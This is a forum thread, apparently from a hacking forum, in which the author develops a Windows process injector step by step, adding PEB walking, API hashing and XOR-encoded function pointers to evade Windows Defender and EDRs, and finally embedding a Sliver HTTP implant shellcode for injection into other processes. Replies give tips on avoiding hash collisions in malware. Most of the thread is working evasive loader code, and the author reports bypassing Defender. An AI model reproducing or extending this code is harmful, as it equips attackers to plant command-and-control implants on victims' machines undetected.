
Evolving from basic

el84

Hello, in this thread I will start a new project where my plan is to begin with a very simple code and improve it along the time using my free time. As you all will notice this first version of the code have nothing fancy and it is the purpose that it start from the most basic thread(shellcode) injector. So for this starting point I choose the following requirements .

The program should receive a single parameter which is the Process ID of the target process to inject the shellcode and to just use C standard library and WinAPI. For this first version there is no much to talk about, I used the atoi() function to convert the parameter(process id) from C string to integer and then a sequence of calls to WinAPI to reach the goal. The name of the functions from WinAPI are self explanatory but I'm also adding the links to documentation just in case.

The payload included with the program is just a "NOP NOP NOP RET" in x86_64 is useful in this context to test if the injector is working, the target process should keep running fine and the injector itself should end returning 0.

Implementation:
C:
#include <Windows.h>
#include <stdio.h>
#include <stdbool.h>

char payload[] = { 0x90,0x90 ,0x90, 0x90, 0xc3 };

int main(int argc, char** argv)
{
    int pid;
    HANDLE proc_handle, remote_thread_handle;
    void* remote_mem;
    size_t written;

    if (argc < 2) {
        printf("Usage: %s <pid>\n", argv[0]);
        return 1;
    }

    pid = atoi(argv[1]);
    proc_handle = OpenProcess(
        PROCESS_CREATE_THREAD |
        PROCESS_QUERY_INFORMATION |
        PROCESS_VM_OPERATION |
        PROCESS_VM_WRITE |
        PROCESS_VM_READ, false, pid);
   
    if (proc_handle == NULL) {
        printf("Can't open process %d\n", pid);
        return GetLastError();
    }

    printf("proc_handle = %p", proc_handle);

    remote_mem = VirtualAllocEx(
        proc_handle, NULL, sizeof(payload), MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    if (remote_mem == NULL) {
        printf("failed to allocate remote memory");
        return GetLastError();
    }

    WriteProcessMemory(
        proc_handle, remote_mem, payload, sizeof(payload), &written);

    remote_thread_handle =
        CreateRemoteThread(proc_handle, NULL, 0,
            (LPTHREAD_START_ROUTINE)remote_mem, NULL, 0, NULL);

    if (remote_thread_handle == NULL) {
        printf("failed to create remote thread");
        return GetLastError();
    }

    return 0;
}

This simple program which don't even inject malicious code yet is already flagged as defense evasion by defender as can be seen on the following image, so in the next post I should change the code to just works without triggering defender:


Observation for mods: I will keep a similar thread on XSS, Ramp and Exp, just warn me if its should not be done here.

flagged_def_evasion.png
Hello again, as a first improvement I want to implement the technique know as API Hashing, which consist in locating the functions from modules (eg: ntdll.dll) using the hash of the name of module and function. The first step on doing this is to first locate the structs to traverse all loaded modules the way to do this is start by getting PEB address which has the member Ldr described as:

A pointer to a PEB_LDR_DATA structure that contains information about the loaded modules for the process.

I used to use inline-asm to get PEB reference, but in this project I choose to use Visual Studio (just x86-64) and it don't allow __asm directives anymore, so I though if WinAPI have ready made functions useful for this case. With a quick search I found GetPebAddress() which do exactly what is needed but it give me linking errors when I tried to use, this can be fixed but will introduce a dependency in our code which is a bad approach for any kind of malware. Searching a bit more I see that some people recommend to use NtQueryInformationProcess() to query the "ProcessBasicInformation" which contains the PEB address, it will work but still not useful for our purpose, as stateded in the documentation:

This function has no associated import library. You must use the LoadLibrary and GetProcAddress functions to dynamically link to Ntdll.dll.

Using LoadLibrary and GetProcAddress will be a red flag in almost all EDRs, therefore I get back on the original plan, I know that PEB address is stored at offset 0x60 in from a base stored in GS register, since I cant use inline I needed to learn how to include asm into a C/C++ using Visual Studio. I found this tutorial Adding x86, x64 Assembly Language code to the Visual Studio C++ which is very straight. I will not repeat the steps from tutorial here since its very easy to follow.

After enabling masm in the project I did the same thing I would do using __asm direct, I added a new file called peb.asm in the project and implemented a single function to retrieve the PEB address, here is the code:
Code:
.CODE

get_peb PROC
    mov rax, gs:[60h]
    ret
get_peb ENDP

END

Then in the previous code for the thread injector we need to declare the function, this can be done in the following way:

C:
extern PEB * get_peb();

Finally to test if its all going as expected, I just used the implemented function and printed the return in stardard output, also ran the code the debugger x64dbg to compare the PEB address returned from our function and the command peb() from the debugg.


C:
int main(int argc, char** argv)
{
    PEB * ppeb;
    ppeb = get_peb();
    printf("PEB @ %p\n", ppeb);

Here is the output from the program and x64dbg showing the same value for peb():
PEB_correct.png


This finishes this post, I know the API hashing is not implemented but we moved a bit into the path to implement it and also acquired the skill to use ASM in our project whenever its needed. Feel free to ask questions.
 
I walked a bit more, I still not implemented the API Hashing but improved the code to traverse the loaded modules and functions names searching for the function by name. For this a created a new function which receive the PEB address and function name to seek for. There is some details on how to traverse the modules but I think the code speaks for it self:

Here is the implementation:
C:
#include <Windows.h>
#include <stdio.h>
#include <stdbool.h>
#include <winternl.h>

extern PEB * get_peb();

char payload[] = { 0x90,0x90 ,0x90, 0x90, 0xc3 };

void* get_proc(PEB* ppeb, char* proc_name)
{
    LIST_ENTRY* l = ppeb->Ldr->InMemoryOrderModuleList.Flink;
    do {
        LDR_DATA_TABLE_ENTRY* ldrentry = CONTAINING_RECORD(l, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
        IMAGE_DOS_HEADER* module = ldrentry->DllBase;
        IMAGE_NT_HEADERS64* nt_header = (void*)((char*)ldrentry->DllBase + module->e_lfanew);

        if (nt_header->FileHeader.Characteristics & IMAGE_FILE_DLL) {
            IMAGE_EXPORT_DIRECTORY *export_dir = (void*)((char*)ldrentry->DllBase + nt_header->OptionalHeader.DataDirectory[0].VirtualAddress);
            char * module_name = (void*)((char*)ldrentry->DllBase + export_dir->Name);
            //printf("mod_name = %s\n", module_name);

            PDWORD funcs_name = (void*)((char*)ldrentry->DllBase + export_dir->AddressOfNames);
            PDWORD funcs_addr = (void*)((char*)ldrentry->DllBase + export_dir->AddressOfFunctions);
            PWORD ords = (void*)((char*)ldrentry->DllBase + export_dir->AddressOfNameOrdinals);
            
            for (unsigned int i = 0; i < export_dir->NumberOfNames; i++) {
                char * func_name = (void*)((char*)ldrentry->DllBase + funcs_name[i]);
                void * func_ptr = (void*)((char*)ldrentry->DllBase + funcs_addr[ords[i]]);
            
                if (strcmp(func_name, proc_name) == 0) {
                    return func_ptr;
                }
            }

        }

        l = l->Flink;
    } while (l != &ppeb->Ldr->InMemoryOrderModuleList);

    return NULL;
}

HANDLE (*OpenProcessPtr)(
    _In_ DWORD dwDesiredAccess,
    _In_ BOOL bInheritHandle,
    _In_ DWORD dwProcessId
);

LPVOID (*VirtualAllocExPtr)(
    _In_ HANDLE hProcess,
    _In_opt_ LPVOID lpAddress,
    _In_ SIZE_T dwSize,
    _In_ DWORD flAllocationType,
    _In_ DWORD flProtect
);

BOOL (*WriteProcessMemoryPtr)(
    _In_ HANDLE hProcess,
    _In_ LPVOID lpBaseAddress,
    _In_reads_bytes_(nSize) LPCVOID lpBuffer,
    _In_ SIZE_T nSize,
    _Out_opt_ SIZE_T* lpNumberOfBytesWritten
);

HANDLE (*CreateRemoteThreadPtr)(
    _In_ HANDLE hProcess,
    _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,
    _In_ SIZE_T dwStackSize,
    _In_ LPTHREAD_START_ROUTINE lpStartAddress,
    _In_opt_ LPVOID lpParameter,
    _In_ DWORD dwCreationFlags,
    _Out_opt_ LPDWORD lpThreadId
);

int main(int argc, char** argv)
{
    PEB * ppeb;
    ppeb = get_peb();
    OpenProcessPtr = get_proc(ppeb, "OpenProcess");
    VirtualAllocExPtr = get_proc(ppeb, "VirtualAllocEx");
    WriteProcessMemoryPtr = get_proc(ppeb, "WriteProcessMemory");
    CreateRemoteThreadPtr = get_proc(ppeb, "CreateRemoteThread");

    printf("OpenProcessPtr @ %p\n", OpenProcessPtr);
    printf("VirtualAllocEx @ %p\n", VirtualAllocExPtr);
    printf("WriteProcessMemoryPtr @ %p\n", WriteProcessMemoryPtr);
    printf("CreateRemoteThreadPtr @ %p\n", CreateRemoteThreadPtr);

    int pid;
    HANDLE proc_handle, remote_thread_handle;
    void* remote_mem;
    size_t written;

    if (argc < 2) {
        printf("Usage: %s <pid>\n", argv[0]);
        return 1;
    }

    pid = atoi(argv[1]);
    proc_handle = OpenProcessPtr(
        PROCESS_CREATE_THREAD |
        PROCESS_QUERY_INFORMATION |
        PROCESS_VM_OPERATION |
        PROCESS_VM_WRITE |
        PROCESS_VM_READ, false, pid);
    
    if (proc_handle == NULL) {
        printf("Can't open process %d\n", pid);
        return GetLastError();
    }

    printf("proc_handle = %p", proc_handle);

    remote_mem = VirtualAllocExPtr(
        proc_handle, NULL, sizeof(payload), MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    if (remote_mem == NULL) {
        printf("failed to allocate remote memory");
        return GetLastError();
    }

    WriteProcessMemoryPtr(
        proc_handle, remote_mem, payload, sizeof(payload), &written);

    remote_thread_handle =
        CreateRemoteThreadPtr(proc_handle, NULL, 0,
            (LPTHREAD_START_ROUTINE)remote_mem, NULL, 0, NULL);

    if (remote_thread_handle == NULL) {
        printf("failed to create remote thread");
        return GetLastError();
    }

    return 0;
}

A curious thing, is that even this version is using C Strings to search for the functions which our thread injections needs, it seems to be enough to fool Windows Defender, I injected our "useless" code into a fresh notepad.exe process as a test and had 0 detection:

bypass_defender.png


To make get_proc() works as real API Hashing we should change the second parameter from C String to integer(hash value) and change from strcmp test to equality comparison with the hash value, it must be very straight. The next step is to do this and then try to use the injector with know malicious code.

I used to use inline-asm to get PEB reference, but in this project I choose to use Visual Studio (just x86-64) and it don't allow __asm directives anymore, so I though if WinAPI have ready made functions useful for this case
In case of getting PEB there are intrinsic functions that can be used, like __readgsqword on x64 or __readfsdrword on x86: https://learn.microsoft.com/ru-ru/c...dgsdword-readgsqword-readgsword?view=msvc-170 (intrinsics are not functions per se, basically it is small inline asm code).
 
Thanks for the input I used some intrinsic in GCC in the past but I don't even remember that this think exist and I never was aware about the __readgsqword. I will change the code to use it in the next changes, I think it will be better to make this project in a single .c file at least for now.
 
Here is an update on code, I think we can call it an API hashing even that my implementation of hash is very naive. First of all I created a separated program to compute the hash and output it as defines, the idea is to generate a header hash.h to use in our implementation to make lookup easy. The implementation is very straight here is code:

C:
#include <stdio.h>
#include <stdint.h>

uint64_t hash(char *str)
{
    uint64_t ret = 1;
    unsigned char c;
    
    for (int i = 1337; (c = *str++); i+=c) {
        ret += c * i;       
    }

    return ret;
}

struct ftable {
    char* mod;
    char* fname;
} table[] = {
    {"KERNEL32.dll", "OpenProcess"},
    {"KERNEL32.dll", "VirtualAllocEx"},
    {"KERNEL32.dll", "WriteProcessMemory"},
    {"KERNEL32.dll", "CreateRemoteThread"}
};

int main(int argc, char** argv)
{
    for (int i = 0; i < sizeof(table) / sizeof(struct ftable); i++) {
        printf("#define %s_HASH\t\t0x%llx\n",
            table[i].fname, hash(table[i].mod) + hash(table[i].fname) );
    }
}

The output of this code is as follows:
Code:
#define OpenProcess_HASH                0x3888ae
#define VirtualAllocEx_HASH             0x43bb4c
#define WriteProcessMemory_HASH         0x58b55b
#define CreateRemoteThread_HASH         0x552ca9

As you can see I used the sum of the hashes of module name and function name, so this is how we need to lookup in our previous get_proc() function, I updated the code for this and also changed the get_peb() function to use intrinsic __readgsqword (greetz to DildoFagins ), so here is the new implementation:

C:
#include <Windows.h>
#include <stdio.h>
#include <stdbool.h>
#include <stdint.h>
#include <winternl.h>
#include "hash.h"

char payload[] = { 0x90,0x90 ,0x90, 0x90, 0xc3 };

uint64_t hash(char* str)
{
    uint64_t ret = 1;
    unsigned char c;

    for (int i = 1337; (c = *str++); i += c) {
        ret += c * i;
    }

    return ret;
}

PEB* get_peb()
{
    return (PEB*)__readgsqword(0x60);
}

void* get_proc(PEB* ppeb, uint64_t func_hash)
{
    LIST_ENTRY* l = ppeb->Ldr->InMemoryOrderModuleList.Flink;
    do {
        LDR_DATA_TABLE_ENTRY* ldrentry = CONTAINING_RECORD(l, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
        IMAGE_DOS_HEADER* module = ldrentry->DllBase;
        IMAGE_NT_HEADERS64* nt_header = (void*)((char*)ldrentry->DllBase + module->e_lfanew);

        if (nt_header->FileHeader.Characteristics & IMAGE_FILE_DLL) {
            IMAGE_EXPORT_DIRECTORY *export_dir = (void*)((char*)ldrentry->DllBase + nt_header->OptionalHeader.DataDirectory[0].VirtualAddress);
            char * module_name = (void*)((char*)ldrentry->DllBase + export_dir->Name);
            
            PDWORD funcs_name = (void*)((char*)ldrentry->DllBase + export_dir->AddressOfNames);
            PDWORD funcs_addr = (void*)((char*)ldrentry->DllBase + export_dir->AddressOfFunctions);
            PWORD ords = (void*)((char*)ldrentry->DllBase + export_dir->AddressOfNameOrdinals);
            
            for (unsigned int i = 0; i < export_dir->NumberOfNames; i++) {
                char * func_name = (void*)((char*)ldrentry->DllBase + funcs_name[i]);
                void * func_ptr = (void*)((char*)ldrentry->DllBase + funcs_addr[ords[i]]);
            
                if (hash(module_name)+hash(func_name) == func_hash) {
                    return func_ptr;
                }
            }

        }

        l = l->Flink;
    } while (l != &ppeb->Ldr->InMemoryOrderModuleList);

    return NULL;
}

HANDLE (*OpenProcessPtr)(
    _In_ DWORD dwDesiredAccess,
    _In_ BOOL bInheritHandle,
    _In_ DWORD dwProcessId
);

LPVOID (*VirtualAllocExPtr)(
    _In_ HANDLE hProcess,
    _In_opt_ LPVOID lpAddress,
    _In_ SIZE_T dwSize,
    _In_ DWORD flAllocationType,
    _In_ DWORD flProtect
);

BOOL (*WriteProcessMemoryPtr)(
    _In_ HANDLE hProcess,
    _In_ LPVOID lpBaseAddress,
    _In_reads_bytes_(nSize) LPCVOID lpBuffer,
    _In_ SIZE_T nSize,
    _Out_opt_ SIZE_T* lpNumberOfBytesWritten
);

HANDLE (*CreateRemoteThreadPtr)(
    _In_ HANDLE hProcess,
    _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,
    _In_ SIZE_T dwStackSize,
    _In_ LPTHREAD_START_ROUTINE lpStartAddress,
    _In_opt_ LPVOID lpParameter,
    _In_ DWORD dwCreationFlags,
    _Out_opt_ LPDWORD lpThreadId
);

int main(int argc, char** argv)
{
    PEB * ppeb;
    ppeb = get_peb();
    OpenProcessPtr = get_proc(ppeb, OpenProcess_HASH);
    VirtualAllocExPtr = get_proc(ppeb, VirtualAllocEx_HASH);
    WriteProcessMemoryPtr = get_proc(ppeb, WriteProcessMemory_HASH);
    CreateRemoteThreadPtr = get_proc(ppeb, CreateRemoteThread_HASH);

    printf("OpenProcessPtr @ %p\n", OpenProcessPtr);
    printf("VirtualAllocEx @ %p\n", VirtualAllocExPtr);
    printf("WriteProcessMemoryPtr @ %p\n", WriteProcessMemoryPtr);
    printf("CreateRemoteThreadPtr @ %p\n", CreateRemoteThreadPtr);

    int pid;
    HANDLE proc_handle, remote_thread_handle;
    void* remote_mem;
    size_t written;

    if (argc < 2) {
        printf("Usage: %s <pid>\n", argv[0]);
        return 1;
    }

    pid = atoi(argv[1]);
    proc_handle = OpenProcessPtr(
        PROCESS_CREATE_THREAD |
        PROCESS_QUERY_INFORMATION |
        PROCESS_VM_OPERATION |
        PROCESS_VM_WRITE |
        PROCESS_VM_READ, false, pid);
    
    if (proc_handle == NULL) {
        printf("Can't open process %d\n", pid);
        return GetLastError();
    }

    printf("proc_handle = %p", proc_handle);

    remote_mem = VirtualAllocExPtr(
        proc_handle, NULL, sizeof(payload), MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    if (remote_mem == NULL) {
        printf("failed to allocate remote memory");
        return GetLastError();
    }

    WriteProcessMemoryPtr(
        proc_handle, remote_mem, payload, sizeof(payload), &written);

    remote_thread_handle =
        CreateRemoteThreadPtr(proc_handle, NULL, 0,
            (LPTHREAD_START_ROUTINE)remote_mem, NULL, 0, NULL);

    if (remote_thread_handle == NULL) {
        printf("failed to create remote thread");
        return GetLastError();
    }

    return 0;
}

I just tested the code as is and it injected into a fresh notepad process without any problems, now we have a basic injector but it still not very useful since its just injecting a few bytes for testing purposes.
 
I think we can call it an API hashing even that my implementation of hash is very naive
Hash collisions while getting API pointers can be dreadfull for your malware. Basically if you find a pointer to another function because of hash collision (not the function you was looking for) the call would most likely crash your process. Maybe you could catch it with VEH and somehow recover from it in a proper way, but I'd rather be using a better hash function instead. As far as I remember Murmur is pretty good on Latin1 character set in terms of collision propability, you can also try out DJB2, FNV or Jenkins, which are pretty simple while having somewhat good (small) collision propability.
 
I looked for some implementations before rolling this "shitty" function myself, I wonder if EDRs and some static analysis don't auto detect some implementations actually, but you are right. I don't even tested my hash function for collisions with a big dataset. I think it will be a nice test to verify how hard is to produce a collision (using valid dlls and function names) with this too naive approach.
 
I wonder if EDRs and some static analysis don't auto detect some implementations actually
You wouldn't add static detections soly on the public and well known algorithm that can be used in million different codebases, would you?
 
Yep it cant add flag, it will create a shitload of false positives in a lot of software even DBs, I was looking about how can I evaluate my naive function but it seems true hard. Its a giant matter which have great challanges. I also take a look on some implementations. I think I will stick with djb2 from here http://www.cse.yorku.ca/~oz/hash.html
 
Hi everyone, I made new changes on this code, the first one is to use a well know hash function(djb2) instead my naive implementation. I implemented a basic technique to encode the WinAPI function pointers instead of just storing them, the motivation is that a memory scan will find out a function table with values pointing to WinAPI very easily.

To implement this technique I introduced a new structure which will hold a 64bit random value used to encode the function pointer with XOR, and a field for every encoded pointer to be stored, as follows:

C:
struct func_ptrs {
    unsigned long long rval;
    OpenProcessPtr_t OpenProcessPtr;
    VirtualAllocExPtr_t VirtualAllocExPtr;
    WriteProcessMemoryPtr_t WriteProcessMemoryPtr;
    CreateRemoteThreadPtr_t CreateRemoteThreadPtr;
};

To initialize the struct I introduced the function init_table() which create the random 64bit value, and then use this values to encode pointers returned by get_proc() and finally store each pointer in the struct:


C:
void init_table(struct func_ptrs *fptrs)
{
    PEB* ppeb;
    unsigned long long x = 0;

    srand(time(NULL));
    for (int i = 0; i < 8; i++)
        x = x << 8 | ((unsigned long long)rand() & 0xff);
   
    fptrs->rval = x;

    ppeb = get_peb();
    fptrs->OpenProcessPtr =    (OpenProcessPtr_t)(x ^ (unsigned long long)get_proc(ppeb, OpenProcess_HASH));
    fptrs->VirtualAllocExPtr = (VirtualAllocExPtr_t)(x ^ (unsigned long long)get_proc(ppeb, VirtualAllocEx_HASH));
    fptrs->WriteProcessMemoryPtr = (WriteProcessMemoryPtr_t)(x ^ (unsigned long long)get_proc(ppeb, WriteProcessMemory_HASH));
    fptrs->CreateRemoteThreadPtr = (CreateRemoteThreadPtr_t)(x ^ (unsigned long long)get_proc(ppeb, CreateRemoteThread_HASH));

    printf("OpenProcessPtr @ %p\n", fptrs->OpenProcessPtr);
    printf("VirtualAllocEx @ %p\n", fptrs->VirtualAllocExPtr);
    printf("WriteProcessMemoryPtr @ %p\n", fptrs->WriteProcessMemoryPtr);
    printf("CreateRemoteThreadPtr @ %p\n", fptrs->CreateRemoteThreadPtr);
}

From this point on, we have almost all that is needed to use the WinAPI, but for the sake of usability I also introduced a convoluted macro FCALL, which receive the name of a variable of type struct func_ptrs, name of field (function pointer), and finally the parameters to the WinAPI function, it will expand to the necessary code to decode the function pointer, cast it to the correct type and call the respective function:

C:
#define FCALL(fptr, fname, ...) \
    ( _Generic(fptr.fname, \
    OpenProcessPtr_t: (OpenProcessPtr_t)((unsigned long long)fptr.fname ^ fptr.rval ), \
    VirtualAllocExPtr_t: (VirtualAllocExPtr_t)((unsigned long long)fptr.fname ^ fptr.rval ), \
    WriteProcessMemoryPtr_t: (WriteProcessMemoryPtr_t)((unsigned long long)fptr.fname ^ fptr.rval ), \
    CreateRemoteThreadPtr_t: (CreateRemoteThreadPtr_t)((unsigned long long)fptr.fname ^ fptr.rval ) \
    ) (__VA_ARGS__) )

Even that the macro code seems strange because the usage of _Generic and variadic-args, the usage is very easy, here is a example of call to OpenProcess():


C:
    pid = atoi(argv[1]);
    proc_handle = FCALL(fptrs, OpenProcessPtr,
        PROCESS_CREATE_THREAD |
        PROCESS_QUERY_INFORMATION |
        PROCESS_VM_OPERATION |
        PROCESS_VM_WRITE |
        PROCESS_VM_READ, false, pid
    );

I did not included the typedefs before but here is the entire implementation if someone want to reuse something:


C:
#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <stdint.h>
#include <winternl.h>
#include <time.h>


#include "hash.h"

char payload[] = { 0x90,0x90 ,0x90, 0x90, 0xc3 };

// djb2 from http://www.cse.yorku.ca/~oz/hash.html
unsigned long hash(unsigned char* str)
{
    unsigned long hash = 5381;
    int c;

    while (c = *str++)
        hash = ((hash << 5) + hash) + c; /* hash * 33 + c */

    return hash;
}

PEB* get_peb()
{
    return (PEB*)__readgsqword(0x60);
}

void* get_proc(PEB* ppeb, uint64_t func_hash)
{
    LIST_ENTRY* l = ppeb->Ldr->InMemoryOrderModuleList.Flink;
    do {
        LDR_DATA_TABLE_ENTRY* ldrentry = CONTAINING_RECORD(l, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
        IMAGE_DOS_HEADER* module = ldrentry->DllBase;
        IMAGE_NT_HEADERS64* nt_header = (void*)((char*)ldrentry->DllBase + module->e_lfanew);

        if (nt_header->FileHeader.Characteristics & IMAGE_FILE_DLL) {
            IMAGE_EXPORT_DIRECTORY *export_dir = (void*)((char*)ldrentry->DllBase + nt_header->OptionalHeader.DataDirectory[0].VirtualAddress);
            char * module_name = (void*)((char*)ldrentry->DllBase + export_dir->Name);
           
            PDWORD funcs_name = (void*)((char*)ldrentry->DllBase + export_dir->AddressOfNames);
            PDWORD funcs_addr = (void*)((char*)ldrentry->DllBase + export_dir->AddressOfFunctions);
            PWORD ords = (void*)((char*)ldrentry->DllBase + export_dir->AddressOfNameOrdinals);
           
            for (unsigned int i = 0; i < export_dir->NumberOfNames; i++) {
                char * func_name = (void*)((char*)ldrentry->DllBase + funcs_name[i]);
                void * func_ptr = (void*)((char*)ldrentry->DllBase + funcs_addr[ords[i]]);
           
                if (hash(module_name)+hash(func_name) == func_hash) {
                    return func_ptr;
                }
            }

        }

        l = l->Flink;
    } while (l != &ppeb->Ldr->InMemoryOrderModuleList);

    return NULL;
}


typedef HANDLE(*OpenProcessPtr_t)(
    _In_ DWORD dwDesiredAccess,
    _In_ BOOL bInheritHandle,
    _In_ DWORD dwProcessId
    );
typedef     LPVOID(*VirtualAllocExPtr_t)(
    _In_ HANDLE hProcess,
    _In_opt_ LPVOID lpAddress,
    _In_ SIZE_T dwSize,
    _In_ DWORD flAllocationType,
    _In_ DWORD flProtect
    );
typedef BOOL(*WriteProcessMemoryPtr_t)(
    _In_ HANDLE hProcess,
    _In_ LPVOID lpBaseAddress,
    _In_reads_bytes_(nSize) LPCVOID lpBuffer,
    _In_ SIZE_T nSize,
    _Out_opt_ SIZE_T* lpNumberOfBytesWritten
    );
typedef     HANDLE(*CreateRemoteThreadPtr_t)(
    _In_ HANDLE hProcess,
    _In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,
    _In_ SIZE_T dwStackSize,
    _In_ LPTHREAD_START_ROUTINE lpStartAddress,
    _In_opt_ LPVOID lpParameter,
    _In_ DWORD dwCreationFlags,
    _Out_opt_ LPDWORD lpThreadId
    );

struct func_ptrs {
    unsigned long long rval;
    OpenProcessPtr_t OpenProcessPtr;
    VirtualAllocExPtr_t VirtualAllocExPtr;
    WriteProcessMemoryPtr_t WriteProcessMemoryPtr;
    CreateRemoteThreadPtr_t CreateRemoteThreadPtr;
};

void init_table(struct func_ptrs *fptrs)
{
    PEB* ppeb;
    unsigned long long x = 0;

    srand(time(NULL));
    for (int i = 0; i < 8; i++)
        x = x << 8 | ((unsigned long long)rand() & 0xff);
   
    fptrs->rval = x;

    ppeb = get_peb();
    fptrs->OpenProcessPtr =    (OpenProcessPtr_t)(x ^ (unsigned long long)get_proc(ppeb, OpenProcess_HASH));
    fptrs->VirtualAllocExPtr = (VirtualAllocExPtr_t)(x ^ (unsigned long long)get_proc(ppeb, VirtualAllocEx_HASH));
    fptrs->WriteProcessMemoryPtr = (WriteProcessMemoryPtr_t)(x ^ (unsigned long long)get_proc(ppeb, WriteProcessMemory_HASH));
    fptrs->CreateRemoteThreadPtr = (CreateRemoteThreadPtr_t)(x ^ (unsigned long long)get_proc(ppeb, CreateRemoteThread_HASH));

    printf("OpenProcessPtr @ %p\n", fptrs->OpenProcessPtr);
    printf("VirtualAllocEx @ %p\n", fptrs->VirtualAllocExPtr);
    printf("WriteProcessMemoryPtr @ %p\n", fptrs->WriteProcessMemoryPtr);
    printf("CreateRemoteThreadPtr @ %p\n", fptrs->CreateRemoteThreadPtr);
}

#define FCALL(fptr, fname, ...) \
    ( _Generic(fptr.##fname, \
    OpenProcessPtr_t: (OpenProcessPtr_t)((unsigned long long)fptr.##fname ^ fptr.rval ), \
    VirtualAllocExPtr_t: (VirtualAllocExPtr_t)((unsigned long long)fptr.##fname ^ fptr.rval ), \
    WriteProcessMemoryPtr_t: (WriteProcessMemoryPtr_t)((unsigned long long)fptr.##fname ^ fptr.rval ), \
    CreateRemoteThreadPtr_t: (CreateRemoteThreadPtr_t)((unsigned long long)fptr.##fname ^ fptr.rval ) \
    ) (__VA_ARGS__) )

int main(int argc, char** argv)
{
    struct func_ptrs fptrs;
    init_table(&fptrs);
   
    int pid;
    HANDLE proc_handle, remote_thread_handle;
    void* remote_mem;
    size_t written;

    if (argc < 2) {
        printf("Usage: %s <pid>\n", argv[0]);
        return 1;
    }

    pid = atoi(argv[1]);
    proc_handle = FCALL(fptrs, OpenProcessPtr,
        PROCESS_CREATE_THREAD |
        PROCESS_QUERY_INFORMATION |
        PROCESS_VM_OPERATION |
        PROCESS_VM_WRITE |
        PROCESS_VM_READ, false, pid
    );
   
    if (proc_handle == NULL) {
        printf("Can't open process %d\n", pid);
        return GetLastError();
    }
   
    printf("proc_handle = %p", proc_handle);
   
    remote_mem = FCALL(fptrs, VirtualAllocExPtr,
        proc_handle, NULL, sizeof(payload), MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );

    if (remote_mem == NULL) {
        printf("failed to allocate remote memory");
        return GetLastError();
    }

    FCALL(fptrs, WriteProcessMemoryPtr,
        proc_handle, remote_mem, payload, sizeof(payload), &written
    );

    remote_thread_handle =
        FCALL(fptrs, CreateRemoteThreadPtr,
            proc_handle, NULL, 0,
            (LPTHREAD_START_ROUTINE)remote_mem, NULL, 0, NULL
        );

    if (remote_thread_handle == NULL) {
        printf("failed to create remote thread");
        return GetLastError();
    }
   
    return 0;
}

It worked fine in my tests, all functions are returning as expected, next step will be to use well know malicous code which will be detected at first and then make the needed changes to make it evade again.
 
As I said before the plan now is to include malicious payload and as an example my choice is to use Sliver http implant since sliver can generate shellcode for this kind of implant. I generate the payload as follows:

_sliver_gen.png


The main problem is that the payload is 17 MB. Although it is possible to use xxd -i to create an include file (e.g. payload.h), that causes problems and a ridiculous amount of RAM usage at build time, because the compiler has to parse the whole 17 MB as one enormous initializer. To include the payload together with our injector we have a lot of options; I am used to the INCBIN macro, which is very simple. Even though it is an external dependency (a single .h), I think it is useful and easy enough to be worth adding to the project.

My choice caused some problems. The first is that the MSVC compiler lacks inline asm, which makes the implementation of INCBIN trickier; this is explained in the project's README. Since I don't want the project to become complex, I moved from MSVC to x86_64-w64-mingw32-gcc. I did not need to change much to make it compile: in fact the only change was from include <Windows.h> to include <windows.h>. Then I tried to use the code as before: I recompiled gen_hdr.c with gcc for my own system (Linux x64), used it to create hash.h, and finally compiled program.c using mingw.

The program did not work as expected. After looking at the code again I noticed that the only possible cause was the hash function behaving differently when compiled with gcc for Linux x64 and with mingw. That turned out to be the problem: the hash function used unsigned long, which is 64-bit with gcc on Linux x64 and 32-bit with mingw on Windows x64. This happens because systems took different approaches when extending their data models to 64-bit: Linux x64 is LP64 and Windows x64 is LLP64. Here is a table which summarizes the differences:

_LP64.png
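
The width difference between the two data models can be seen with a small, generic sketch. It is not taken from the project: ulong_bits, mix64, mix_ulong and print_model are hypothetical names used only for illustration. The idea is that the same arithmetic wraps at a different point when the type is unsigned long, while a fixed-width type from stdint.h behaves the same on both systems.

```c
#include <assert.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>

/* Bits in unsigned long on the target being compiled for:
 * 64 under LP64 (Linux x64), 32 under LLP64 (Windows x64). */
unsigned ulong_bits(void)
{
    return (unsigned)(sizeof(unsigned long) * CHAR_BIT);
}

/* Hypothetical accumulator (illustration only): wraps at 2^64 everywhere. */
uint64_t mix64(const char *s)
{
    uint64_t h = 0;

    assert(s != NULL);
    while (*s != '\0')
        h = h * 31u + (unsigned char)*s++;
    return h;
}

/* Same arithmetic with unsigned long: wraps at 2^32 under LLP64. */
unsigned long mix_ulong(const char *s)
{
    unsigned long h = 0;

    assert(s != NULL);
    while (*s != '\0')
        h = h * 31u + (unsigned char)*s++;
    return h;
}

/* Prints both results so two builds can be compared side by side. */
void print_model(const char *s)
{
    printf("unsigned long: %u bits\n", ulong_bits());
    printf("mix64     = %llu\n", (unsigned long long)mix64(s));
    printf("mix_ulong = %llu\n", (unsigned long long)mix_ulong(s));
}
```

Calling print_model() with a long enough string from main() in a native Linux build and in a mingw build should show the two values agreeing on the first and diverging on the second, since only the fixed-width version is independent of the data model.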


I could use better types such as uint64_t from stdint.h, which work as expected across any OS/arch, but as a quick fix I just changed the hash function to use unsigned long long, so both systems work with 64 bits. I will provide a reference on LP64 at the end. The good thing is that after this change the code worked as expected. I then put the win_http_shellcode file in the project path and changed program.c as follows:
C:
#define INCBIN_PREFIX
#define INCBIN_STYLE INCBIN_STYLE_SNAKE
#include "incbin.h"

INCBIN(payload, "win_http_shellcode");
//...same as before...
        remote_mem = FCALL(fptrs, VirtualAllocExPtr,
                proc_handle, NULL, payload_size, MEM_COMMIT | MEM_RESERVE,
                PAGE_EXECUTE_READWRITE
        );
//...same as before...
        FCALL(fptrs, WriteProcessMemoryPtr,
                proc_handle, remote_mem, payload_data, payload_size, &written
        );

